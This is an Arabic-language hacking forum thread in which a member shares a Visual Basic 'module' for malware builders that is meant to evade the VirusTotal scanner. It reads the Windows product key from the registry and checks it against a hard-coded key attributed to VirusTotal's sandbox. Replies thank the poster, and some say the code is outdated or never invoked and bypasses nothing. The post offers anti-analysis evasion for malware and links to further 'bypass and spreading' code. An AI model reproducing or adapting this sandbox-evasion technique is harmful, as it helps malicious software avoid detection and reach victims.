][موديل تخطي موقع الفحص الشهير VirusTotal ][

تم تحميل الصفحة في 1,5051843 ثانية
][موديل تخطي موقع الفحص الشهير VirusTotal ][
الحالة
مغلق و غير مفتوح للمزيد من الردود.
إنضم
15 أغسطس 2010
المشاركات
1,721
الإعجابات
221
النقاط
0
العمر
21


][كيف حالكم يائعضاء الديف الغاليين][ :32: ][ انشالله باْلف خير][

[اقدم لكم موديل لتخطي موقع الفحص الشهير VirusTotal ]



هاهو الكود

كود:
Option Explicit
 
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias  "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult  As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias  "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String,  ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As  Long) As Long
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)
Public Function VirusTotal() As String
If WinProdKey = "GC8X9-9Y376-BMTFR-T3Q63-R969Q" Then
MsgBox "virustotal"
End
Else
MsgBox "infect"
End If
End Function
Public Function WinProdKey() As String
    Dim lhKey           As Long
    Dim bvBuffer(163)   As Byte
    Dim vCharset        As Variant
    Dim bvChar(23)      As Byte
    Dim i               As Long
    Dim j               As Long
    Dim lCur            As Long
 
    If RegOpenKey(&H80000002, "SOFTWARE\MICROSOFT\Windows NT\CurrentVersion", lhKey) = 0& Then
        If RegQueryValueEx(lhKey, "DigitalProductId", 0, 3, bvBuffer(0), 164) = 0 Then
 
            Call CopyMemory(bvBuffer(0), bvBuffer(52), &HF)
 
            vCharset = Array( _
               "B", "C", "D", "F", "G", "H", "J", "K", "M", "P", "Q", "R", _
               "T", "V", "W", "X", "Y", "2", "3", "4", "6", "7", "8", "9")
 
            For i = 0 To 23
                bvChar(i) = Asc(vCharset(i))
            Next
 
            For i = 24 To 0 Step -1
                lCur = 0
                For j = 14 To 0 Step -1
                    lCur = lCur * 256 Xor bvBuffer(j)
                    bvBuffer(j) = Int(lCur / 24)
                    lCur = lCur Mod 24
                Next
                WinProdKey = vCharset(lCur) & WinProdKey
                If i Mod 5 = 0 And i <> 0 Then WinProdKey = "-" & WinProdKey
            Next
 
        End If
        Call RegCloseKey(lhKey)
    End If
End Function

طريقة التركيب



ثم اختر الموديل



ثم الصق كود التخطي الذي تريده




هاذا موضوعي السابق للذين يريدون اكواد تخطي وانتشارات اخرى

http://www.dev-point.com/vb/t225156.html



بالاخير ارجوا ان تكونوا استفدتوا من هاذا الكود

تم بحمد الله وحفظه

في امان الله



 
إنضم
2 يناير 2007
المشاركات
914
الإعجابات
91
النقاط
0
رد: ][موديل تخطي موقع الفحص الشهير VirusTotal ][

اول رد محجوووووووووووووووووووووووووووووووووووووووووووووووووووووووز
 
إنضم
16 أغسطس 2010
المشاركات
151
الإعجابات
15
النقاط
0
رد: ][موديل تخطي موقع الفحص الشهير VirusTotal ][

سؤال ؟؟
كيف يتخطاها يعني ؟؟
هل هو لما نفحص ما بيرسل قيم ؟؟
ولا لما نفحص بتطلع النتيجة كلين مع انه يمكن يكون مكشوف ارجو انك توضح
 
إنضم
18 أبريل 2009
المشاركات
594
الإعجابات
52
النقاط
28
رد: ][موديل تخطي موقع الفحص الشهير VirusTotal ][

يا سلام عليك

عقليه dz صح

الف شكر لك يا بطل

:32:
 
إنضم
19 أغسطس 2010
المشاركات
1,780
الإعجابات
181
النقاط
63
رد: ][موديل تخطي موقع الفحص الشهير VirusTotal ][

بارك الله فيك ولد البلاد
 
إنضم
19 أغسطس 2010
المشاركات
1,780
الإعجابات
181
النقاط
63
رد: ][موديل تخطي موقع الفحص الشهير VirusTotal ][

تم دعسك بتقييم

همسه اقرا التقييم حبي ♥
 

YasS!n£E

Active DeveloPer
rankrankrank
إنضم
10 مارس 2011
المشاركات
522
الإعجابات
83
النقاط
0
رد: ][موديل تخطي موقع الفحص الشهير VirusTotal ][

مشكوووووووووووووووووووور اخي الكريم !!!
:9:
:)
:32:


للعلم اخي فقد اصبح هذا الموديول لا يتخطى عن تجربة و مراجعة للكود فهو قديم
 
إنضم
28 أكتوبر 2009
المشاركات
2,965
الإعجابات
1,192
النقاط
113
الإقامة
Egypt
رد: ][موديل تخطي موقع الفحص الشهير VirusTotal ][

مشكور اخوي

لكن الكو ده بيفحص الويندوز الوهمي الخاص بــvirustotal
وأعرف ان فيرس توتال مش جهاز واحد :15:

ولا واندوز واحد :16:
 

M7snoo

DeveloPer Plus
rankrankrankrank
إنضم
21 أغسطس 2010
المشاركات
1,087
الإعجابات
130
النقاط
0
رد: ][موديل تخطي موقع الفحص الشهير VirusTotal ][

مشكور اخوي

لكن الكو ده بيفحص الويندوز الوهمي الخاص بــvirustotal
وأعرف ان فيرس توتال مش جهاز واحد :15:

ولا واندوز واحد :16:
بَطَل مِن ظَهْر أَبْطَال ، :30:
شُكْرَآ لَك عَلَى الْمَعْلُوْمَات ، جَارِي الْتَقَيِيِم ،
:32:
 

abead

DeveloPer Plus
rankrankrankrank
إنضم
10 مارس 2011
المشاركات
1,620
الإعجابات
48
النقاط
0
رد: ][موديل تخطي موقع الفحص الشهير VirusTotal ][

يعطيك العافية
 
إنضم
14 أغسطس 2010
المشاركات
209
الإعجابات
223
النقاط
0
رد: ][موديل تخطي موقع الفحص الشهير VirusTotal ][

الكود لا يتخطى اي شيء ...فقط للتحقق من سريال الوندوز على فيروس توتال هذا ان كان موجودا أصلا

يظهر رسالة virus total ثم بعدها infect و لا يغلق السرفر حتى

هناك ملاحظة أخرى ....كيف سيعمل الموديل ان لم تعمل له call !!!!؟؟؟؟
المهم شكرا ولد لبلاد على الطرح :12:


 
الحالة
مغلق و غير مفتوح للمزيد من الردود.

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل